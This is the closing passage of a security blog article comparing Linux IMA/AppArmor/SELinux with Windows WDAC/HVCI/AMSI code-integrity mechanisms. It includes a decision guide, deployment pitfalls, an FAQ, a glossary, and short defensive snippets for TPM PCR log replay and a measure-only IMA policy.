Confidential-computing efforts (Intel TDX, AMD SEV-SNP) are pushing toward a common report/quote primitive at the platform layer, and the TCG Canonical Event Log Format aims at a portable per-entry representation. Workload-level integrity proofs remain stack-specific. The two operating systems do not yet speak a common attestation language.

| Problem | Current best partial result | Upstream status |
|---|---|---|
| IMA appraisal scale on RPM-signed distros | Integrity Digest Cache, 45-65% appraisal speedup | Patchset v6 (Nov 2024); not upstream |
| AMSI in-process trust boundary | Signed provider DLLs, ETW patch detection, CLM | Partial; structural fix would be OOP broker |
| Linux script-content scanning | Nothing in production | Open |
| Cross-OS attestation interop | TCG CEL, TDX/SEV-SNP quotes | Platform-layer; workload-level still split |
| WDAC LOLBin treadmill | Microsoft block list + LOLBAS + WDAC Wizard | Operational; structural fix unknown |

Each of these will probably ship in the 2026-2028 window. None of them dissolves the theoretical bounds of Section 8. The job for a defender in 2026 is therefore **operational**, not technological.

## 10. Practitioner decision guide

Eight common deployment scenarios. Eight concrete answers.

| If you need... | On Linux, use... | On Windows, use... |
|---|---|---|
| TPM-backed remote attestation | IMA + EVM (TPM PCR 10) | Measured Boot + TPM PCR 11 + HVCI |
| Block unsigned drivers | `module.sig_enforce=1` plus kernel module signing | HVCI (Memory Integrity) |
| Cryptographic allowlist of installed software | fapolicyd (RPM/DEB trust) | App Control with Publisher rules |
| Per-app sandbox | AppArmor or SELinux | AppContainer or ASR rules (no direct equivalent) |
| Catch in-memory PowerShell payloads | (no direct equivalent) | AMSI |
| Consumer-grade reputation gating | (no direct equivalent) | Smart App Control |
| Immutable appliance image | dm-verity + IPE | App Control with hash rules + HVCI |
| Large APK-style assets verified lazily | fs-verity | (no direct equivalent) |

The why behind each row.

**TPM-backed attestation.** On Linux, IMA's measurement mode extends file hashes into PCR 10 and ships the measurement log to a remote verifier (Keylime, Veraison). On Windows it means consuming the Measured Boot event log the kernel emits while VBS+HVCI is enabled. Both stacks target the same root of trust (the TPM) but speak different event formats.
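Different event formats, same underlying primitive. A sketch of the replay a remote verifier performs, assuming a SHA-256 PCR bank and illustrative digests (a real verifier would parse IMA's `ascii_runtime_measurements` on Linux or the WBCL on Windows):

```python
import hashlib

def replay_measurement_log(event_digests, bank="sha256"):
    # PCRs start at all-zero bytes and can only be extended:
    #   PCR_new = H(PCR_old || event_digest)
    # Replaying the full log must reproduce the quoted PCR value,
    # or the log has been truncated, reordered, or forged.
    size = hashlib.new(bank).digest_size
    pcr = b"\x00" * size
    for digest in event_digests:
        pcr = hashlib.new(bank, pcr + digest).digest()
    return pcr
```

Order sensitivity is the point: an attacker cannot drop or re-sort entries without changing the replayed value, which is why a measurement log plus a signed TPM quote over the PCR is sufficient evidence.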

**Blocking unsigned drivers.** Linux uses a built-in kernel flag (`module.sig_enforce=1`). Windows needs HVCI, because the kernel-mode CI check runs in VTL1, out of reach of any policy weakening attempted from VTL0, even with SYSTEM privileges.

**Application allowlisting on general-purpose distributions.** This is fapolicyd's wheelhouse: it inherits trust from the RPM/DEB database, which is the only place a general-purpose distro has a clean "trusted" list. On Windows, App Control with publisher rules plus a managed-installer policy is the equivalent.

**Per-app sandboxing.** Clean Linux story (AppArmor or SELinux per binary). On Windows it is the gap App Control was never quite designed to fill; [AppContainer](/blog/appcontainer-and-lowbox-tokens-windowss-capability-sandbox/) or Microsoft Defender Attack Surface Reduction rules are the substitutes.

**In-memory PowerShell payloads.** AMSI's use case. Linux has nothing equivalent in production.

**Consumer reputation gating.** Smart App Control's use case. Linux distros have nothing equivalent because the distribution-package model already plays that role.

**Immutable appliance images.** Dm-verity plus IPE on Linux. App Control hash rules plus HVCI on Windows.

**Large lazy-loaded assets.** Fs-verity territory; Windows has no public equivalent.

### Common implementation pitfalls

Every one of these pitfalls has the same shape: a default that surprises operators.

- **IMA without EVM and without a TPM-sealed key is decorative.** Hashing files into an xattr the attacker can rewrite buys you nothing against offline access. EVM is mandatory; the EVM key must be sealed.
- **AppArmor profiles authored in *complain* mode never get promoted to *enforce*.** Schedule a config-management pass that runs `aa-enforce` on the profiles you actually want to confine.
- **SELinux `setenforce 0` for debugging that becomes permanent.** Track that you flipped enforcement off; and if SELinux spent any time disabled, touching `/.autorelabel` (and rebooting) is required to restore file contexts before enforcing again.
- **fapolicyd permissive-mode lapses.** Set up alerting on `permissive=1` in the runtime configuration; treat the daemon's exit status as a security event.
- **WDAC's `Enabled:Audit Mode` policy-rule option is on by default.** Policies silently do not enforce until you remove it. Add a deployment check that asserts audit mode is *off* before declaring rollout complete.
- **HVCI without a driver-compatibility check.** Microsoft's `DG_Readiness_Tool` and the HVCI compatibility report belong in every pilot. Drivers that allocate RWX kernel pages will fail to load under HVCI and can leave the host unbootable.
- **Treating AMSI as a control.** It is telemetry. Budget for the bypass on day one.
- **Smart App Control disable is one-way.** A single mis-click ends the consumer reputation gate until the device is reset. Make sure the user understands this before they tap the toggle.

> **Note:** On Linux: enable IMA in `measure` mode before `appraise`; deploy AppArmor / SELinux profiles in *complain* / *permissive* before *enforce*; run fapolicyd with `permissive=1` for the first deploy. On Windows: leave WDAC's `Enabled:Audit Mode` set during the first rollout and use the event log to identify the policy gaps before flipping to enforced. Audit mode is the only safe way to discover that the policy is wrong before it locks you out of production.
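On the Linux side, the measure-before-appraise advice reduces to a policy file. An illustrative measure-only starter policy for `/etc/ima/ima-policy` (the `fsmagic` constants are the standard kernel values; tune the `dont_measure` list to your actual mounts before trusting it):

```
# /etc/ima/ima-policy -- illustrative measure-only starter policy.
# Nothing here blocks; every rule only records into the measurement log.

# Skip pseudo-filesystems that churn on every boot.
dont_measure fsmagic=0x9fa0        # procfs
dont_measure fsmagic=0x62656572    # sysfs
dont_measure fsmagic=0x01021994    # tmpfs

# Measure executed binaries, executable mappings, and kernel modules.
measure func=BPRM_CHECK mask=MAY_EXEC
measure func=FILE_MMAP mask=MAY_EXEC
measure func=MODULE_CHECK
```

Only once the measurement log stabilises across a representative boot-and-workload cycle does swapping `measure` for `appraise` (with `appraise_type=imasig`) become safe.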

> **Note:** A bare IMA appraisal policy without an HMAC-keyed EVM (and without the key sealed to a TPM 2.0 PCR set) does not stop an offline attacker. If you do not have TPM-sealed key custody and signed xattrs, IMA appraisal is mostly a check-box. fapolicyd with `integrity=ima` may be a saner starting point on machines without TPM.

<FAQ title="Frequently asked questions">

<FAQItem question="Should I enable IMA appraise mode on a general-purpose Linux server?">
Usually no, unless your distribution signs every system file (most do not for `imasig` in production) and you have a TPM-sealed EVM key. For general-purpose servers, fapolicyd with RPM-database trust is usually the right answer; it inherits trust from packages you already trust and does not require kernel-side signature infrastructure. Reserve IMA appraise for appliance / fixed-function builds, embedded distros, or fleets with a signed-package pipeline.
</FAQItem>

<FAQItem question="Why does AppArmor work for me when SELinux gave me headaches?">
Path-based reasoning maps to how administrators think about confinement: "this binary may read /etc/nginx, may write /var/log/nginx, may bind a network socket." SELinux's type-enforcement model is more expressive (it lets a single rule cover an entire class of objects across paths and bind mounts), but it requires the administrator to think in compiled-policy terms. Both are correct; pick the one whose mental model matches your team. The right answer on Ubuntu and SUSE is almost always AppArmor; the right answer on RHEL and Android is almost always SELinux.
</FAQItem>

<FAQItem question="Can I block all LOLBins with one WDAC policy?">
No. Microsoft's [block list](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/applications-that-can-bypass-appcontrol) grows whenever a new signed binary turns out to host an attacker-friendly evaluator. Treat WDAC as defence-in-depth, layered with HVCI and AMSI-as-telemetry, not as a single-point allowlist. The WDAC Wizard and AaronLocker projects automate keeping the deny set current; even with them, expect the deny set to evolve every quarter.
</FAQItem>

<FAQItem question="Is AMSI worth enabling if it is bypassable?">
Yes. Enable it, but configure it as a telemetry source feeding Defender for Endpoint and any EDR pipeline you operate. The bypass family of Section 7 is real, but the un-bypassed case still catches the long tail of script-based attacks that do not bother defeating AMSI, and the bypass attempt itself is highly detectable (in-memory patch ETW events). Treat AMSI alerts as detective controls, not preventive controls.
</FAQItem>

<FAQItem question="Does HVCI hurt my battery life or performance?">
On CPUs with [Intel MBEC (Kaby Lake or newer) or AMD GMET (Zen 2 or newer)](https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs), the steady-state overhead is generally under 5 percent. On older CPUs that rely on the Restricted User Mode emulation path, kernel-bound workloads can see 10 to 20 percent regressions. Run your specific kernel-bound benchmarks on the actual hardware before enabling on a fleet with a mixed CPU generation; "free" is a Kaby Lake-and-newer claim.
</FAQItem>

<FAQItem question="Will Smart App Control work on my Windows 11 enterprise laptop?">
Usually no. SAC auto-disables on enterprise-managed devices (Intune-enrolled, Azure AD-joined, or under Group Policy management) at the end of the 48-hour evaluation window unless the user explicitly opts in. The intended deployment model is that enterprises use full App Control with a managed-installer policy, not SAC. If SAC has already auto-disabled and you actually want it on, the only path to re-enable is a clean install of Windows. A Settings > Reset This PC does not bring it back.
</FAQItem>

</FAQ>

The two architectures answer the same question with different trade-offs. A practitioner in 2026 needs both maps, because the bypass that breaks the Linux side rarely looks like the bypass that breaks the Windows side, and the mitigation that fixes one is rarely the mitigation that fixes the other.

What stays constant is the lesson the two lineages converged on over fifteen years: the trust boundary is the architecture. Move the verifier out of reach. Allowlist the producers. Treat the things that cannot be moved as telemetry, not as control. None of that closes Rice's wall, but all of it pushes the actual exploitable surface back another mile, on both operating systems.

<StudyGuide slug="linux-ima-apparmor-vs-wdac-amsi-code-integrity-lineages" keyTerms={[
  { term: "IMA", definition: "Linux Integrity Measurement Architecture. Hashes files at LSM hook points; can measure (record into TPM PCR 10), appraise (block on mismatch), or audit." },
  { term: "EVM", definition: "Extended Verification Module. HMACs (or signs) the security xattrs IMA depends on, so an offline attacker who rewrites security.ima cannot also forge security.evm." },
  { term: "AppArmor", definition: "Path-based Linux MAC, merged to mainline in 2.6.36 (Oct 2010). Default on Ubuntu and SUSE. Profiles are loaded from user space and compiled to in-kernel DFAs." },
  { term: "SELinux", definition: "Label-based Linux MAC merged to mainline in 2.6.0 (Dec 2003). Default on RHEL, Fedora, Oracle Linux, Android. Type-enforcement on subject x object x class." },
  { term: "fapolicyd", definition: "Red Hat userspace allowlister sitting on the fanotify permission channel. Trust inherited from the RPM database; rules in /etc/fapolicyd/rules.d/." },
  { term: "fs-verity", definition: "Per-file Merkle-tree authenticity, Linux 5.4 (Nov 2019). O(log n) per-page verification; constant-time digest retrieval; supported on ext4, f2fs, btrfs." },
  { term: "IPE", definition: "Integrity Policy Enforcement, Linux 6.12 (Nov 2024). Property-based decisions: dm-verity root hash, fs-verity digest, initramfs origin. O(1) per access." },
  { term: "WDAC / App Control", definition: "Windows code-integrity policy mechanism, originally Device Guard (Windows 10 1507). Signed XML compiled to .p7b, evaluated at PE load. Renamed App Control for Business in 2024." },
  { term: "HVCI / Memory Integrity", definition: "Hypervisor-Protected Code Integrity. Kernel-mode CI check moved into VTL1 of Hyper-V, isolated from the VTL0 normal kernel. Same mechanism marketed under three names." },
  { term: "AMSI", definition: "Antimalware Scan Interface. In-process script-broker COM API (AmsiScanBuffer) called by PowerShell, WSH, VBA, MSHTA, UAC installer, .NET. Provider is Defender by default." },
  { term: "Smart App Control", definition: "Consumer-facing pre-baked WDAC policy shipped with Windows 11 22H2. 48-hour evaluation window, one-way disable, cloud reputation via the Intelligent Security Graph." },
  { term: "LSM", definition: "Linux Security Modules. Kernel framework merged Dec 2003 that hosts security modules at well-defined hook points. Hosts SELinux, AppArmor, IMA, EVM, IPE, BPF LSM, Landlock." },
  { term: "MAC", definition: "Mandatory Access Control. Kernel-enforced policy layer above DAC that no userspace privilege can override; the operator, not the file owner, sets policy." },
  { term: "TPM PCR 10", definition: "The TPM Platform Configuration Register IMA extends file-content hashes into. Monotonic, extendable as PCR_new = SHA256(PCR_old || hash); used as the anchor for remote attestation." },
  { term: "Authenticode", definition: "Microsoft's PE signing format. Anchors WDAC's Publisher, PcaCertificate, and LeafCertificate rule kinds; signed catalogues (.cat) provide pre-computed hashes for catalogued files." },
  { term: "LOLBin", definition: "Living-Off-the-Land Binary. A trusted binary, often vendor-signed, repurposed by attackers to bypass an allowlist (e.g. mshta.exe evaluating an HTA blob)." },
  { term: "Constrained Language Mode", definition: "Reduced PowerShell language mode App Control forces with UMCI on. Blocks reflection, dynamic-type creation, and arbitrary .NET API calls; restricts evaluation surface." }
]} />
